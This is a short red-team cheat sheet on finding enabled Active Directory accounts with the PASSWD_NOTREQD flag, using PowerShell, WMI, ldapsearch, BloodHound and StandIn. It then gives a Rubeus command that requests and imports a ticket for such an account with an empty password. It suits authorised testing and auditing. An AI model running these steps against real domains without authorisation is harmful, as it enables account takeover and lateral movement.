Search for enabled accounts that have the PASSWD_NOTREQD flag (userAccountControl bit 0x20, value 32) set. The flag exempts the account from the domain password policy, so the password may be empty — but the flag alone does not prove that it is.
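# ActiveDirectory module — PasswordNotRequired maps to userAccountControl bit 0x20 (PASSWD_NOTREQD)
Get-ADUser -Filter {PasswordNotRequired -eq $true -and Enabled -eq $true} | Select SamAccountName
# WMI — Win32_UserAccount lists local accounts; on a domain-joined host it can also enumerate
# domain accounts, which may be slow on large domains. Get-WmiObject is deprecated, Get-CimInstance
# runs the same query.
Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE PasswordRequired=False AND Disabled=False" | select Name
Get-CimInstance -Query "SELECT * FROM Win32_UserAccount WHERE PasswordRequired=False AND Disabled=False" | select Name
# Ldapsearch — 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND; 32 = PASSWD_NOTREQD, 2 = ACCOUNTDISABLE.
# The filter must be quoted for the shell, and ldapsearch needs a host, bind identity and search base
# (prefer ldaps:// or -Y GSSAPI over a simple bind on plain ldap://).
ldapsearch -x -H 'ldaps://<dc-fqdn>' -D '<user>@<domain>' -W -b 'DC=domain,DC=local' \
  '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' cn
# BloodHound (Cypher)
MATCH (n:User {enabled: True, passwordnotreqd: True}) RETURN n
# StandIn
StandIn.exe --passnotreq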
Once an account is identified, confirm that its password is actually empty by requesting a TGT with Rubeus:
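# PASSWD_NOTREQD only permits an empty password; the account may still have one set.
# A returned TGT confirms the password is empty; a pre-authentication failure (KDC_ERR_PREAUTH_FAILED)
# indicates a password is set. /ptt imports the ticket into the current logon session; add /domain: and
# /dc: if they are not resolved automatically. If the Rubeus build in use does not accept an empty
# /password, the RC4 key of the empty password (/rc4:31d6cfe0d16ae931b73c59d7e0c089c0) is equivalent.
Rubeus.exe asktgt /user:<sAMAccountName> /password:"" /ptt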
Credit:
https://northwave-security.com/abusing-empty-passwords-during-your-next-red-teaming-engagement/